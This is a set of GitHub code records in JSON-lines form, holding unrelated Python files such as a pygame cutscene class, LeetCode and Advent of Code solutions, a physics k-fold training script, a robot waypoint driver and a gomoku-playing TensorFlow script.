hold_cou = 0\r\n\r\n def __init__(self, screen, gsobj):\r\n self.screen = screen\r\n self.screct = self.screen.get_rect()\r\n\r\n self.gsobj = gsobj\r\n\r\n self.image = pygame.Surface(self.screct.size)\r\n self.image.fill(BLACK)\r\n\r\n # is this transition done or not?\r\n self.done = False\r\n\r\n def update(self):\r\n \"\"\" update our image's alpha value \"\"\"\r\n if self.hold_cou < self.linger:\r\n self.hold_cou += 1\r\n else:\r\n self.finish()\r\n\r\n def finish(self):\r\n \"\"\" called when the transition is finished \"\"\"\r\n # set the state back to the player\r\n self.gsobj.state = 1\r\n\r\n # reset the transition for the future\r\n self.reset()\r\n\r\n self.done = True\r\n\r\n def draw(self):\r\n \"\"\" draw the image on the screen \"\"\"\r\n self.screen.blit(self.image, (0, 0))\r\n\r\n def 
check_event(self, event):\r\n \"\"\" forward all events to the player \"\"\"\r\n if event.type == pygame.KEYDOWN:\r\n self.gsobj.forward_keydown(event.key)\r\n elif event.type == pygame.KEYUP:\r\n self.gsobj.forward_keyup(event.key)\r\n\r\n def draw_main(self):\r\n \"\"\" needed to become a valid game state \"\"\"\r\n pass\r\n\r\n def reset(self):\r\n \"\"\" reset the transition \"\"\"\r\n self.done = False\r\n\r\n self.hold_cou = 0\r\n\r\n","repo_name":"ColtonUnruh/Pyformer","sub_path":"source_code/pymphony/cutscene/cutscene.py","file_name":"cutscene.py","file_ext":"py","file_size_in_byte":3080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} {"seq_id":"17787749981","text":"from typing import List\n\nclass Solution:\n    def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n        def Partition(kvList, left, right):\n            temp = kvList[left]\n            while left < right:\n                # scan from the right for an entry whose count is smaller than temp's\n                while left < right and kvList[right][1] >= temp[1]:\n                    right -= 1\n                kvList[left] = kvList[right]\n                # scan from the left for an entry whose count is larger than temp's\n                while left < right and kvList[left][1] <= temp[1]:\n                    left += 1\n                kvList[right] = kvList[left]\n            # place temp into the last vacated slot\n            kvList[left] = temp\n            return left\n\n        def quickSort(kvList, left, right):\n            if left < right:\n                index = Partition(kvList, left, right)\n                if index > target:\n                    quickSort(kvList, left, index - 1)\n                elif index < target:\n                    quickSort(kvList, index + 1, right)\n                else:\n                    return\n\n\n        # try it with quicksort (quickselect on the counts)\n        map = {}\n        for i in nums:\n            if i in map:\n                map[i] += 1\n            else:\n                map[i] = 1\n        kvList = []\n        for key, value in map.items():\n            kvList.append((key, value))\n\n        if len(kvList) == 1:\n            return [kvList[0][0]]\n\n        # partition around position n-k (ascending by count), so the k largest counts end up at the tail\n        target = len(kvList) - k\n        quickSort(kvList, 0, len(kvList)-1)\n        kvList.reverse()\n        return [_[0] for _ in kvList[:k]]\n\n        # quickSort(nums, 0, left)\n        # quickSort(nums, left+1, len(nums)-1)\n        # quickSort(nums, 0, len(nums)-1)\n        # print(nums)\n\nif __name__ == '__main__':\n    print(Solution().topKFrequent(nums = [5,-3,9,1,7,7,9,10,2,2,10,10,3,-1,3,7,-9,-1,3,3], k = 3))","repo_name":"Witness521/leetcode","sub_path":"HOT100/快速排序.py","file_name":"快速排序.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} {"seq_id":"38990138990","text":"from recordtype import recordtype\nimport pathlib\nimport os\nimport numpy as np\nimport argparse\n\nimport dadrah.kfold_pipeline.kfold_training as ktrain\nimport dadrah.kfold_pipeline.kfold_envelope as kenlo\nimport dadrah.kfold_pipeline.kfold_poly_fitting as kpofi\nimport dadrah.kfold_pipeline.kfold_prediction as kpred\nimport dadrah.kfold_pipeline.kfold_string_constants as kstco\nimport dadrah.kfold_pipeline.kfold_util as kutil\nimport dadrah.util.logging as log\n\n\n# ******************************************** #\n# main #\n# ******************************************** #\n\n\nif __name__ == '__main__':\n\n # command line\n parser = argparse.ArgumentParser(description='read arguments for k-fold QR training')\n parser.add_argument('-r', dest='qr_run_n', type=int, help='experiment run number')\n # qr hyperparams\n parser.add_argument('-ln', dest='layers_n', type=int, help='number of layers')\n parser.add_argument('-nn', dest='nodes_n', type=int, help='number of nodes')\n parser.add_argument('-bn', dest='batch_sz', type=int, help='batch size')\n parser.add_argument('-lr', dest='lr', type=float, help='learning rate')\n parser.add_argument('-ac', dest='acti', type=str, help='activation function')\n parser.add_argument('-in', dest='initial', choices=['he','glorot'], help='weight 
initializer')\n # samples\n parser.add_argument('-read', dest='read_n', type=int, help='number of samples to read')\n # envelope and polynomials run n\n parser.add_argument('-en', dest='env_run_n', type=int, help='envelope number (f of bins)', default=0)\n parser.add_argument('-pn', dest='poly_run_n', type=int, help='polyfit number (f of order)', default=0)\n # loading options\n parser.add_argument('--loadqr', dest='train_models', action=\"store_false\", help='load previously trained qr models')\n parser.add_argument('--loadenv', dest='calc_envelope', action=\"store_false\", help='load previously calulated envelope')\n parser.add_argument('--loadpoly', dest='fit_polynomials', action=\"store_false\", help='load previously fitted polynomials')\n # binning options\n parser.add_argument('-bi', dest='binning', choices=['linear', 'expo', 'dijet'], help='binning basis for envelope', default='dijet')\n parser.add_argument('-bis', dest='bin_start', type=int, help='index of first bin')\n parser.add_argument('-bin', dest='n_bins', type=int, help='total number of bins')\n parser.add_argument('-bimi', dest='min_mjj', type=float, help='maximal mjj')\n parser.add_argument('-bima', dest='max_mjj', type=float, help='minimal mjj')\n parser.add_argument('--bie', dest='bin_centers', action='store_false')\n # signal injection\n parser.add_argument('-xs', dest='sig_xsec', type=int, help='signal injection rate [femtobarn]', default='0')\n parser.add_argument('-siid', dest='sig_sample_id', choices=['GtoWW15na', 'GtoWW25na', 'GtoWW35na', 'GtoWW45na', 'GtoWW15br', 'GtoWW25br'], default='GtoWW35na')\n\n args = parser.parse_args()\n # optional binning kwargs\n kwargs_bins = {k:v for k,v in vars(args).items() if k in ['bin_start','bin_centers','n_bins','min_mjj','max_mjj'] and v is not None} \n\n # logging\n logger = log.get_logger(__name__)\n logger.info('\\n'+'*'*60+'\\n'+'\\t\\t\\t PREDICTION RUN \\n'+str(args)+'\\n'+'*'*60)\n\n\n # fixed \n Parameters = recordtype('Parameters','qr_run_n, kfold_n, quantiles, qcd_sample_id, sig_sample_id, sig_xsec, score_strategy_id, read_n, layers_n, nodes_n, batch_sz, acti, initial, lr, epochs, optimizer, reg_coeff, env_run_n, binning, poly_run_n, poly_order')\n params = Parameters(qr_run_n=args.qr_run_n,\n kfold_n=5, \n quantiles=[0.3,0.5,0.7,0.9],\n qcd_sample_id='qcdSigAll', \n sig_sample_id=args.sig_sample_id+'Reco', \n sig_xsec=args.sig_xsec, \n score_strategy_id='rk5_05', \n read_n=args.read_n,\n layers_n=args.layers_n,\n nodes_n=args.nodes_n,\n batch_sz=args.batch_sz,\n acti=args.acti,\n initial=(args.initial+'_uniform' if args.initial is not None else None),\n lr=args.lr, \n epochs=50, \n optimizer='adam',\n reg_coeff=0., \n env_run_n=args.env_run_n, \n binning=args.binning, \n poly_run_n=args.poly_run_n, \n poly_order=11,\n )\n\n predict = True\n\n\n logger.info('\\n'+'*'*70+'\\n'+'\\t\\t\\t MAIN K-FOLD SCRIPT \\n'+str(params)+'\\n'+'*'*70)\n\n\n if args.train_models:\n\n # ****************************************************\n # train k models\n # ****************************************************\n\n logger.info('training QR model ' + str(args.qr_run_n))\n\n tb_base_dir = 'logs/tensorboard/' + str(args.qr_run_n)\n \n # models written to: /eos/home-k/kiwoznia/data/QR_models/vae_run_113/qr_run_$run_n_qr$\n # import ipdb; ipdb.set_trace()\n model_paths = ktrain.train_k_models(params, tb_base_dir)\n\n else:\n\n logger.info('loading QR model ' + str(args.qr_run_n))\n\n model_paths = kutil.get_model_paths(params)\n\n\n if args.calc_envelope:\n\n # 
****************************************************\n # calculate cut envelope\n # ****************************************************\n\n\n ### bin edges\n # multiple binning options: dijet, linear, exponential\n bin_edges = kutil.get_bins(bin_type=params.binning, **kwargs_bins)\n logger.info('calculating envelope ' +str(params.env_run_n)+ ' with bins ' + ','.join(['{:.2f}'.format(b) for b in bin_edges]))\n\n envelope_path = kenlo.compute_kfold_envelope(params, model_paths, bin_edges)\n\n else:\n\n logger.info('loading envelope nr ' +str(params.env_run_n))\n envelope_path = kstco.get_envelope_dir(params) # load envelope path\n\n \n if args.fit_polynomials:\n\n # ****************************************************\n # fit polynomials\n # ****************************************************\n\n logger.info('fitting polynomials nr '+str(params.poly_run_n)+' of order '+str(params.poly_order))\n polynomial_paths = kpofi.fit_kfold_polynomials(params, envelope_path)\n\n else:\n logger.info('loading polynomials nr '+str(params.poly_run_n))\n polynomial_paths = kstco.get_polynomials_full_file_path(params)\n\n\n\n if predict:\n\n # ****************************************************\n # predict background and signal\n # ****************************************************\n\n selection_path = kpred.predict_with_polynomials(params, polynomial_paths)\n\n\n# end main \n\n","repo_name":"kingusiu/dadrah","sub_path":"main_kfold.py","file_name":"main_kfold.py","file_ext":"py","file_size_in_byte":6991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34342069082","text":"# E --> N\ndef e_n(n):\n return (n/2)\n\n# N --> Z\ndef n_z(n):\n if n == 1:\n return 0\n elif n%2 == 0:\n return n/2\n else:\n return (n-1)/(-2)\n\n# GCD\ndef gcd(m,n):\n if m%n == 0:\n return n \n else:\n return gcd(n, m%n)\n\n# N --> Q+\ndef n_q_prep(n):\n counter = 0\n layer = 0\n while counter < n:\n counter = counter + (layer + 1)\n layer += 1\n order = n - (counter - layer)\n if layer%2 != 0:\n p = (layer + 1 - order)\n q = order\n else:\n p = order\n q = (layer + 1 - order)\n return (p,q)\n\ndef n_q(n):\n counter = 0\n x = 1\n while counter < n:\n p = n_q_prep(x)[0]\n q = n_q_prep(x)[1]\n if gcd(p,q) == 1:\n x += 1\n counter += 1\n else:\n x += 1\n return p/q\n \n\n\n\n# Z --> Q\ndef z_q(n):\n if n == 0:\n return 0\n elif n > 0:\n return n_q(n)\n elif n < 0:\n return n_q((n*-1))*(-1)\n\n# E --> Q\ndef e_q(n):\n if n == 2:\n return 0\n elif (n/2)%2 != 0:\n return z_q((((n/2)-1)/2))\n else:\n return z_q(((n/2)/2)*(-1))\n\ndef e_q2(n):\n return z_q(n_z(e_n(n)))\n\n\n\nfor x in range(1,11):\n print(n_q(x))\n\n\n\n\n","repo_name":"michael940716/accelerated_cs","sub_path":"summer_2019/cs250/bijection.py","file_name":"bijection.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40848302146","text":"import csv\n\n\ndef main():\n\n ID_NUMBER_INDEX = 0\n NAME_INDEX = 1\n students_dict = read_dictionary(\"students.csv\", ID_NUMBER_INDEX)\n print(students_dict)\n\n id = input(\"Please enter an I-Number: \")\n \n\n\n if id in students_dict:\n value = students_dict[id]\n name = value[NAME_INDEX]\n print(name)\n else:\n print(\"No such student\")\n\n\ndef read_dictionary(filename, key_column_index):\n \"\"\"Read the contents of a CSV file into a compound\n dictionary and return the dictionary.\n\n Parameters\n filename: the name of the CSV file to read.\n key_column_index: the 
index of the column\n to use as the keys in the dictionary.\n Return: a compound dictionary that contains\n the contents of the CSV file.\n \"\"\"\n\n dictionary = {}\n with open(filename,\"rt\") as csv_file:\n\n # use csv module to create a reader object\n reader = csv.reader(csv_file)\n\n # Skip the header row\n next(reader)\n\n # read rows one row at a time.\n for row_list in reader:\n # if data is not blank, add the data to the dictionary\n if len(row_list) != 0:\n # from current row, retrieve the data that contains key\n key = row_list[key_column_index]\n # store data from current row to the dictionary\n dictionary[key] = row_list\n\n return dictionary\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"loopera/Python-Programming-with-Functions","sub_path":"Week5/students.py","file_name":"students.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} {"seq_id":"27734051883","text":"from sys import stdin\n\n\ndef parse_instruction(instruction_str):\n turn = -1 if instruction_str[0] == 'L' else 1\n walk = int(instruction_str[1:])\n return turn, walk\n\n\ndef main():\n instructions = [\n parse_instruction(s)\n for s in stdin.read().strip().split(', ')\n ]\n\n x, y = 0, 0\n dx, dy = 0, -1\n visited = {(0, 0)}\n\n for turn, walk in instructions:\n dx, dy = -turn * dy, turn * dx\n\n for _ in range(walk):\n x += dx\n y += dy\n\n if (x, y) in visited:\n print(abs(x) + abs(y))\n return\n\n visited.add((x, y))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"elemel/advent-of-code","sub_path":"python/2016/day_01/part_2.py","file_name":"part_2.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} {"seq_id":"13072064229","text":"\"\"\"\n\n\n\n__call__:\nThis method fires when we call an object of the class as if it were a function.\nIt is used in the Singleton design pattern.\n\n\n\n\"\"\"\n\n\n\nclass Person:\n \n def __call__(self, value, *args, **kwargs):\n print(value)\n\n\n\nperson_1 = Person()\nperson_1('Mahdi')","repo_name":"mahdi-zarepour/Python3","sub_path":"OOP/Advanced/__call__/__call__.py","file_name":"__call__.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} {"seq_id":"14385211940","text":"from collections import Counter\nclass Solution(object):\n    def kthDistinct(self, arr, k):\n        count = Counter(arr).most_common()\n        remove_set = []\n        \n        for i in count:\n            if i[1] > 1:\n                remove_set.append(i[0])\n        \n        answer = [i for i in arr if i not in remove_set]\n        \n        if len(answer) < k:\n            return \"\"\n        else:\n            return answer[k-1]","repo_name":"qwas15788hj/LeetCode","sub_path":"2053-kth-distinct-string-in-an-array/2053-kth-distinct-string-in-an-array.py","file_name":"2053-kth-distinct-string-in-an-array.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} {"seq_id":"28324046744","text":"import argparse\nimport serial\nimport datetime\nimport re\nimport time\nimport threading\nimport numpy as np\nimport zmq\nimport math\nfrom my_tools import *\n#script to simulate path driving. At each waypoint it aims itself at the next waypoint using the compass. 
\n#meant to work in conjunction with my_tools.py\n\n\n#current issue is that the critical phi is not being calculated correctly, somewhere near getCriticalAngle\n\n#connect to driver-to-gazebo.py interface\ncontext = zmq.Context()\nsocket = context.socket(zmq.REP) \nsocket.bind(\"tcp://*:5557\")\nencoding = 'utf-8'\n\n\n#initialize wheels\nleftWheelPwr = 0.0\nrightWheelPwr = 0.0\n\n\n#knobs\nwheelStrength = 0.01 #constant to govern general wheel strength (set low because we multiply times delta theta)\nangleTolerance = 1 #how far off course (angularly) is ok\ndistanceTolerance = 1 #size of radius at which we count as reaching the waypoint\nforwardsPwm = 3.0 #another strength constant for wheel speed\nbackwardsPwm= 2.0 #this one matters because it could be pos/neg or 16/14 pwm\n#globals # I may want to add \"_global\" at the end of these\nthisLat = 0 #so that they are not confused/mixed up with \nthisLong = 0 #regular variables.\nlatitude = 0\nlongitude = 0\nthetaCoord = 0\nthisDirection = 0\nlastTheta = 999\nlastOmega = 0\nnumWp = 0\nturnR = 1.25 #turn radius (should probably be calculated based on w1, w2, and distance between wheels)\n#test motors\n\ndistance = 0\n\n\n\n \n\ndef driver(path):\n while True:\n doubleOrientDrive(path)\n\ndef compassOrientation(thetaGoal): #use compass to rotate\n global leftWheelPwr # We will set wheel power and just \n global rightWheelPwr \n leftWheelPwr = 0\n rightWheelPwr = 0\n time.sleep(5)\n kP = 0.01\n kD = 0.1\n thetaDiff = abs(thetaCoord - thetaGoal)\n lastTheta = thetaCoord\n while thetaDiff > angleTolerance: #pid loop\n direction = turnTable(thetaCoord,thetaGoal) #which direction to turn\n delta = deltaTheta(direction,thetaCoord,thetaGoal) #calculate how much more turning will be required\n dTheta = thetaCoord - lastTheta\n lastTheta = thetaCoord\n dE = kP*delta - kD*abs(dTheta)\n turnStrength = dE\n if direction > 0:\n leftWheelPwr = turnStrength\n rightWheelPwr = -turnStrength\n else:\n leftWheelPwr = -turnStrength\n rightWheelPwr = turnStrength\n thetaDiff = abs(thetaCoord - thetaGoal)\n time.sleep(0.01)\n leftWheelPwr = 0\n rightWheelPwr = 0\n time.sleep(5)\n\ndef gpsOrientation(thetaGoal): #use gps and gyroscope(compass for now)\n global leftWheelPwr\n global rightWheelPwr\n x1 = latitude\n y1 = longitude \n\n leftWheelPwr = forwardsPwm \n rightWheelPwr = forwardsPwm\n\n time.sleep(2)\n leftWheelPwr = 0\n rightWheelPwr = 0\n time.sleep(2)\n x2 = latitude\n y2 = longitude\n thetaHeading,distance = findBearing(x1,y1,x2,y2)\n direction = turnTable(thetaHeading,thetaGoal)\n compassError = deltaTheta(direction,thetaHeading,thetaGoal)\n if direction > 0: #need to check, might be backwards\n compassOrientation(thetaHeading - compassError)\n if direction < 0:\n compassOrientation(thetaHeading + compassError)\n leftWheelPwr = forwardsPwm\n rightWheelPwr = forwardsPwm\n\ndef doubleOrientDrive(path):\n global leftWheelPwr\n global rightWheelPwr\n lastWp = numWp\n thisY = longitude #translate lat/long to x/y for clarity\n thisX = latitude\n wpX,wpY = getPathPoint(path,numWp + 1)\n print(thisX,thisY,wpX,wpY)\n thetaGoal,distance = findBearing(thisX,thisY,wpX,wpY)\n compassOrientation(thetaGoal) #thetaGoal is the compass angle\n # leftWheelPwr = forwardsPwm\n # rightWheelPwr = forwardsPwm\n gpsOrientation(thetaGoal)\n while (lastWp == numWp): #if the waypoint hasn't changed, keep going\n time.sleep(0.01)\n\n\n\ndef rpServer(): #constantly be communicating with locator\n global latitude #whether it is the arduino giving it gps coordinates from the ublox\n 
global longitude #or simulated coordinates from gazebo\n global thetaCoord\n while True:\n response = str(leftWheelPwr) + \" \" + str(rightWheelPwr)\n message = socket.recv()\n socket.send(response.encode(encoding))\n alphabet = message.decode(encoding)\n data = re.split(' ',alphabet)\n latitude = float(data[0]) \n longitude = float(data[1]) \n thetaCoord = (-(float(data[2])) + 90)%360\n\n\ndef numWpUpdate(path): #function which is constantly checking to see if numWp has been reached and needs to be updated\n global numWp #important parameter to export\n numWp = 0\n lastD = 1e9 #initialize\n while(True): #check waypoints\n thisY = longitude #standard long -> Y\n thisX = latitude #lat -> X (maybe should have been backwards\n nX,nY = getPathPoint(path,numWp + 1) #get position of the next path point\n numD = getEuclidean(thisX,thisY,nX,nY) #get distance to the next path point\n if numD > lastD and numD < distanceTolerance: #if I stopped getting closer to the wp, its time to update\n numWp = numWp + 1\n lastD = numD\n\ndef driveLoop(path,finalLat,finalLong,firstRun): #starts driving/locator threads and checks for completion\n \n if (firstRun == True): #on first run, activate the connection to the locator\n gpsChecker = threading.Thread(target=rpServer) \n gpsChecker.daemon = True\n gpsChecker.start()\n\n pointsChecker = threading.Thread(target=numWpUpdate,args=(path, ))\n pointsChecker.daemon = True\n pointsChecker.start()\n\n\n driveChecker = threading.Thread(target=driver,args=(path,)) \n driveChecker.daemon = True\n driveChecker.start()\n while True: \n time.sleep(5)\n\n\n\n\npath = np.loadtxt('finalPath.txt')\n\n\n#driveLoop(path[0],path[1],True) #actual first step\ndriveLoop(path,0,0,True) #for display purposes\n\n\n\n","repo_name":"skywo1f/electronic-differential","sub_path":"gazebo-simulator/build/SP6.py","file_name":"SP6.py","file_ext":"py","file_size_in_byte":7741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32702933726","text":"import numpy as np\nimport tensorflow as tf\nfrom tensorflow.contrib import predictor\nfrom numpy import unravel_index\nimport time\n\n\ntable = np.zeros([15, 15, 3], dtype=np.float32)\n\nW_conv = tf.get_variable(\"W_conv\", shape=[5, 5, 1, 20])\n\nsess = tf.Session()\nsaver = tf.train.import_meta_graph('./test_model-17.meta')\nsaver.restore(sess, tf.train.latest_checkpoint('./', latest_filename=\"checkpointUchiha\"))\n\n\n\n\ndef sorted_idx_possible(preds, cur_WIDTH, table):\n\tpredstr = np.copy(np.reshape(preds, (225)))\n\tidx = np.argsort(-predstr)\n\tmaxidx = np.empty([cur_WIDTH, 2], dtype = np.int32)\n\tcnt = 0\n\tpos = 0\n\tprobabilities = np.empty((cur_WIDTH), dtype=np.float32)\n\n\twhile cnt < cur_WIDTH:\n\t\twhile pos < 225 and not (table[idx[pos] // 15, idx[pos] % 15, 0] == 0 and table[idx[pos] // 15, idx[pos] % 15, 1] == 0):\n\t\t\tpos += 1\n\n\t\tif pos == 225:\n\t\t\tprint(table[:,:,0])\n\t\t\tprint(table[:,:,1])\n\n\t\tmaxidx[cnt, 0] = idx[pos] // 15\n\t\tmaxidx[cnt, 1] = idx[pos] % 15\n\t\tprobabilities[cnt] = predstr[idx[pos]]\n\t\tcnt += 1\n\t\tpos += 1\n\n\treturn maxidx, probabilities\n\n\n\n\ndef check_win():\n\tfor i in range(11):\n\t\tfor j in range(15):\n\t\t\tsum = np.sum(table[i:i+5, j, 0])\n\t\t\tif sum == 5:\n\t\t\t\treturn 1\n\t\t\tsum = np.sum(table[i:i+5, j, 1])\n\t\t\tif sum == 5:\n\t\t\t\treturn -1\n\n\tfor i in range(15):\n\t\tfor j in range(11):\n\t\t\tsum = np.sum(table[i, j:j+5, 0])\n\t\t\tif sum == 5:\n\t\t\t\treturn 1\n\t\t\tsum = np.sum(table[i, j:j+5, 
1])\n\t\t\tif sum == 5:\n\t\t\t\treturn -1\n\n\tfor i in range(11):\n\t\tfor j in range(11):\n\t\t\tsum = 0\n\t\t\tfor k in range(5):\n\t\t\t\tsum += table[i + k, j + k, 0]\n\t\t\tif sum == 5:\n\t\t\t\treturn 1\n\t\t\tsum = 0\n\t\t\tfor k in range(5):\n\t\t\t\tsum += table[i + k, j + k, 1]\n\t\t\tif sum == 5:\n\t\t\t\treturn -1\n\n\tfor i in range(4, 15):\n\t\tfor j in range(11):\n\t\t\tsum = 0\n\t\t\tfor k in range(5):\n\t\t\t\tsum += table[i - k, j + k, 0]\n\t\t\tif sum == 5:\n\t\t\t\treturn 1\n\t\t\tsum = 0\n\t\t\tfor k in range(5):\n\t\t\t\tsum += table[i - k, j + k, 1]\n\t\t\tif sum == 5:\n\t\t\t\treturn -1\n\n\treturn 0\n\nletters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o']\n\ndef print_board():\n\tprint()\n\tprint(\" 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15\")\n\tfor i in range(15):\n\t\tprint(letters[i], end=\" \")\n\t\tfor j in range(15):\n\t\t\tif table[i, j, 0] == 0 and table[i, j, 1] == 0:\n\t\t\t\tprint('. ', end=\" \")\n\t\t\telif table[i, j, 0] == 1:\n\t\t\t\tprint('X ', end=\" \")\n\t\t\telse:\n\t\t\t\tprint('O ', end=\" \")\n\t\tprint()\n\tprint()\n\n\nprediction_raw = tf.get_default_graph().get_tensor_by_name(name=\"my_prediction:0\")\nprediction = tf.reshape(tf.nn.softmax(prediction_raw), [-1, 15 * 15])\n\n\nprint(\"choose your side\")\nside = input()\n\nif (side == \"black\" or side == \"b\" or side == \"B\" or side == \"1\" or side == \"b_term\"):\n\n\tstep = 1\n\tx_tens = tf.get_default_graph().get_tensor_by_name(name=\"x:0\")\n\n\tif (side != \"b_term\"):\n\t\tprint(\"you play for black\")\n\n\twhile check_win() == 0:\n\n\t\tif (side != \"b_term\"):\n\t\t\tprint_board()\n\n\t\tif (step % 2 == 1):\n\t\t\tif (side != \"b_term\"):\n\t\t\t\tprint(\"your turn\")\n\n\t\t\tx_char = input()\n\t\t\tx = ord(x_char[0]) - ord('a')\n\t\t\ty = int(x_char[1:])\n\t\t\ty -= 1\n\t\t\tif x < 0 or x >= 15 or y < 0 or y >= 15 or table[x, y, 0] != 0:\n\t\t\t\tprint(\"invalid step\\n\")\n\t\t\t\tcontinue\n\t\t\ttable[x, y, 0] = 1\n\t\t\t\n\t\telse:\n\t\t\tpred_np = np.empty((15, 15))\n\t\t\ttime00 = time.time()\n\t\t\tpred_np = sess.run(prediction, feed_dict={x_tens: np.reshape(table, (1, 15, 15, 3))})\n\t\t\tpred_np = np.reshape(pred_np, [15, 15])\n\t\t\tprint(pred_np)\n\t\t\tmax_i = -1\n\t\t\tmax_j = -1\n\t\t\tfor i in range(15):\n\t\t\t\tfor j in range(15):\n\t\t\t\t\tif (max_i == -1 and table[i, j, 1] == 0 and table[i, j, 0] == 0) or \\\n\t\t\t\t\t\t\t\t(max_i != -1 and table[i, j, 1] == 0 and table[i, j, 0] == 0 and pred_np[i, j] > pred_np[max_i, max_j]):\n\t\t\t\t\t\t\t\tmax_i = i\n\t\t\t\t\t\t\t\tmax_j = j\n\n\t\t\tif (side != \"b_term\"):\n\t\t\t\tprint(\"enemy: \", end=\"\")\n\t\t\tprint(letters[max_i], max_j + 1)\n\t\t\t\n\t\t\ttable[max_i, max_j, 1] = 1\n\n\t\tstep += 1\n\n\tprint_board()\n\tif check_win() == 1:\n\t\tprint(\"YOU WIN\")\n\t\texit(1)\n\telse:\n\t\tprint(\"YOU LOSE\")\n\t\texit(2)\nelse:\n\tstep = 0\n\tx_tens = tf.get_default_graph().get_tensor_by_name(name=\"x:0\")\n\ttable[:,:,2] = np.ones((15, 15))\n\n\tif (side != \"w_term\"):\n\t\tprint(\"you play for white\")\n\n\twhile check_win() == 0:\n\n\t\tprint_board()\n\t\tif (step % 2 == 1):\n\t\t\tif (side != \"w_term\"):\n\t\t\t\tprint(\"your turn\")\n\n\t\t\tx_char = input()\n\t\t\tx = ord(x_char[0]) - ord('a')\n\t\t\ty = int(x_char[1:])\n\t\t\ty -= 1\n\t\t\tif x < 0 or x >= 15 or y < 0 or y >= 15 or table[x, y, 0] != 0:\n\t\t\t\tprint(\"invalid step\\n\")\n\t\t\t\tcontinue\n\t\t\ttable[x, y, 1] = 1\n\t\t\t\n\t\telse:\n\t\t\tpred_np = np.empty((15, 15))\n\t\t\tpred_np = 
np.reshape(sess.run(prediction, feed_dict={x_tens: np.reshape(table, (1, 15, 15, 3))}), (15, 15))\n\t\t\tprint(pred_np)\n\n\t\t\tpossible_turn, probabilities = sorted_idx_possible(pred_np, 4, table)\n\t\t\tpos = np.random.choice(4, p=(probabilities / np.sum(probabilities)))\n\t\t\tstep_i = possible_turn[pos, 0]\n\t\t\tstep_j = possible_turn[pos, 1]\n\t\t\tprint(possible_turn)\n\t\t\tprint(probabilities)\n\t\t\tprint(\"I would choose\", step_i, step_j)\n\t\t\tprint()\n\n\n\t\t\tmax_i = -1\n\t\t\tmax_j = -1\n\t\t\tfor i in range(15):\n\t\t\t\tfor j in range(15):\n\t\t\t\t\tif (max_i == -1 and table[i, j, 1] == 0 and table[i, j, 0] == 0) or \\\n\t\t\t\t\t\t\t\t(max_i != -1 and table[i, j, 1] == 0 and table[i, j, 0] == 0 and pred_np[i, j] > pred_np[max_i, max_j]):\n\t\t\t\t\t\t\t\tmax_i = i\n\t\t\t\t\t\t\t\tmax_j = j\n\t\t\t\n\t\t\tif (side != \"w_term\"):\n\t\t\t\tprint(\"enemy: \", end=\"\")\n\t\t\tprint(letters[max_i], max_j + 1)\n\t\t\t\n\t\t\ttable[max_i, max_j, 0] = 1\n\n\t\tstep += 1\n\n\tprint_board()\n\tif check_win() == -1:\n\t\tprint(\"YOU WIN\")\n\t\texit(1)\n\telse:\n\t\tprint(\"YOU LOSE\")\n\t\texit(2)\n\n","repo_name":"Quid37/renju_project","sub_path":"renju/run_game_vs_player.py","file_name":"run_game_vs_player.py","file_ext":"py","file_size_in_byte":5403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} {"seq_id":"771299486","text":"msg = input('Message: ')\nres = list()\ni = 0\nwhile i != len(msg):\n    cache = list()\n    if msg[i].isalpha():\n        start_index = i\n        while True:\n            if i + 1 < len(msg) and msg[i+1].isalpha():\n                i += 1\n            else:\n                cache.append(msg[i:start_index:-1] + msg[start_index])\n                res.append(cache[0])\n                break\n    else:\n        res.append(msg[i])\n    i += 1\nprint(''.join(res))\n","repo_name":"thekiralog/skillbox_copied","sub_path":"Module18/09_message/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} {"seq_id":"42573996324","text":"import numpy as np\n\n\n\ndef check_input(A: np.ndarray, \n blocksize: int, \n comm_size: int):\n \"\"\" Check the validity of the input parameters.\n\n Parameters\n ----------\n A : numpy matrix\n matrix to invert\n blocksize : int\n size of a block\n comm_size : int\n number of processes\n\n Returns\n -------\n None\n\n Raises\n ------\n ValueError\n The matrix size must be a multiple of the blocksize.\n ValueError\n The blocksize must be smaller than the matrix size.\n ValueError\n The blocksize must be greater than 0.\n ValueError\n The number of blocks must be greater than the number of processes.\n \"\"\"\n \n if A.shape[0] % blocksize != 0:\n raise ValueError(\"The matrix size must be a multiple of the blocksize.\")\n \n if blocksize > A.shape[0]:\n raise ValueError(\"The blocksize must be smaller than the matrix size.\")\n \n if blocksize < 1:\n raise ValueError(\"The blocksize must be greater than 0.\")\n \n nblocks = A.shape[0] // blocksize\n if nblocks < 3*comm_size:\n raise ValueError(\"The number of blocks is too low. 
